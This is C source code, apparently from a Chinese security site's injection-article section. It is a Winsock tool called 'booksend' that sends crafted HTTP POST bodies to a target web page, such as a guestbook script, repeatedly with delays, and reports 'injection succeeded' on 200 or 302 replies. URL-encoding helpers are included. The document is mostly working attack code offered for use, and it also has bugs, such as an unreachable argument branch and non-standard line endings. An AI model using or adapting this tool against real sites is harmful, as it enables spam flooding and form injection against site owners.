*/
int isT(char ch)
{
if(ch==’ ’||ch==’%’||ch==’/’||ch&0x80) return 1;
else return 0;
}
int encode(char *s,char *d)
{
if(!s||!d) return 0;
for(;*s!=0;s++)
{
unsigned char *p=(unsigned char*)s;
if(*p==’ ’)
{
*d=’%’;
*(d+1)=’2’;
*(d+2)=’0’;
d+=3;
}
else if(isT(*p))
{
char a[3];
*d=’%’;
sprintf(a,"%02x",*p);
*(d+1)=a[0];
*(d+2)=a[1];
d+=3;
}
else
{
*d=*p;
d++;
}
}
*d=0;
return 1;
}
/* Unencode URL解码函数 */
int unencode(char *s,char *d)
{
if(!s||!d) return 0;
for(;*s!=0;s++)
{
if(*s==’+’)
{
*d=’ ’;
d++;
}
else if(*s==’%’)
{
int code;
if(sscanf(s+1,"%02x",&code)!=1) code=’?’;
*d=code;
s+=2;
d++;
}
else
{
*d=*s;
d++;
}
}
*d=0;
return 1;
}
/* booksend.cpp */
/* 报文发送程序 */
#include <stdio.h>
#include <stdlib.h>
#include "encode.h"
#include <winsock2.h>
#pragma comment(lib,"ws2_32.lib")
int checkpra(int argc,char *argv[]);
void usage();
DWORD WINAPI senddata(LPVOID lp);
char ip[20]={0};
USHORT port=0;
char page[128]={0};
char value[1024]={0};
int ttime=1;
int delaytime=2000;
SOCKET sock;
struct sockaddr_in sin;
char sendbuf[1024*4]={0};
void main(int argc,char *argv[])
{
if(checkpra(argc,argv)==-1) return;
WSADATA wsa;
if(WSAStartup(0x0202,&wsa)!=0)
{
printf("WSAStartup failed with error:%d\n",GetLastError());
return;
}
sin.sin_family=AF_INET;
if(inet_addr(ip)!=INADDR_NONE)
sin.sin_addr.s_addr=inet_addr(ip);
else
{
struct hostent *phost=gethostbyname(ip);
if(phost==NULL)
{
printf("Resolve %s error!\n",ip);
return;
}
memcpy(&sin.sin_addr,phost->h_addr_list[0],phost->h_length);
}
sin.sin_port=htons(port);
char tempbuf[1024]={0};
sprintf(tempbuf,"POST %s HTTP/1.1\n",page);
strcpy(sendbuf,tempbuf);
memset(tempbuf,0,sizeof(tempbuf));
sprintf(tempbuf,"HOST: %s\n",ip);
strcat(sendbuf,tempbuf);
strcat(sendbuf,"Accept: image/gif, */*\n");
strcat(sendbuf,"Content-Type: application/x-www-form-urlencoded\n");
memset(tempbuf,0,sizeof(tempbuf));
sprintf(tempbuf,"Content-Length: %d\n",strlen(value));
strcat(sendbuf,tempbuf);
strcat(sendbuf,"Connection: Keep-Alive\n\n");
strcat(sendbuf,value);
for(int i=0;i<ttime;i++)
{
CreateThread(NULL,0,senddata,&i,0,NULL);
Sleep(delaytime);
}
WSACleanup();
}
DWORD WINAPI senddata(LPVOID lp)
{
SOCKET sock=socket(AF_INET,SOCK_STREAM,0);
if(sock==INVALID_SOCKET)
{
printf("Socket() failed with error:%d\n",GetLastError());
return -1;
}
int ret;
printf("State:Connecting...\n");
ret=connect(sock,(struct sockaddr*)&sin,sizeof(sin));
if(ret==SOCKET_ERROR)
{
printf("Connect() failed with error:%d\n",GetLastError());
return -1;
}
printf("State:Connected!\n");
printf("State:Sending...time %d ",*(int*)lp+1);
ret=send(sock,sendbuf,strlen(sendbuf)+1,0);
if(ret>0)
printf("Send success!\n");
else
printf("Send error!\n");
char recvbuf[1024*10]={0};
ret=recv(sock,recvbuf,sizeof(recvbuf),0);
if(strstr(recvbuf,"100")||strstr(recvbuf,"200")||strstr(recvbuf,"302"))
printf("呵呵,注入成功啦!\n\n");
else
printf("注入有点问题哦,请查实一下!\n\n");
closesocket(sock);
return 1;
}
void usage()
{
char pathname[128]={0};
GetModuleFileName(NULL,pathname,sizeof(pathname));
char *p=pathname+strlen(pathname)-1;
for(;*p!=’\\’;p--);
printf("-------------------------------------------------------------------------------\n");
printf("Usage:%s ip port page value [times] [delay]\n",p+1);
printf("Code by JsuFcz--http://jsufcz.21xcn.net\n");
printf("Ex:%s 10.0.0.169 80 /guestbk/add.php name=abc-body=hehe-doadd=发送留言",p+1);
printf("-------------------------------------------------------------------------------\n");
}
int checkpra(int argc,char *argv[])
{
if(argc<5)
{
printf("错误的用法:至少应使用4个参数\n\n");
usage();
return -1;
}
else if(argc>6)
{
printf("错误的用法:最多只有6个参数\n\n");
usage();
return -1;
}
if(argc==6)
{
ttime=atoi(argv[5]);
}
if(argc==7)
{
ttime=atoi(argv[5]);
delaytime=atoi(argv[6]);
}
strcpy(ip,argv[1]);
port=atoi(argv[2]);
strcpy(page,argv[3]);
for(int i=0;argv[4][i]!=0;i++)
{
if(argv[4][i]==’-’) argv[4][i]=’&’;
if(argv[4][i]==’\’’) argv[4][i]=’ ’;
}
encode(argv[4],value);
return 0;
} |
安全中国首页 > 文章中心 > 综合注入文章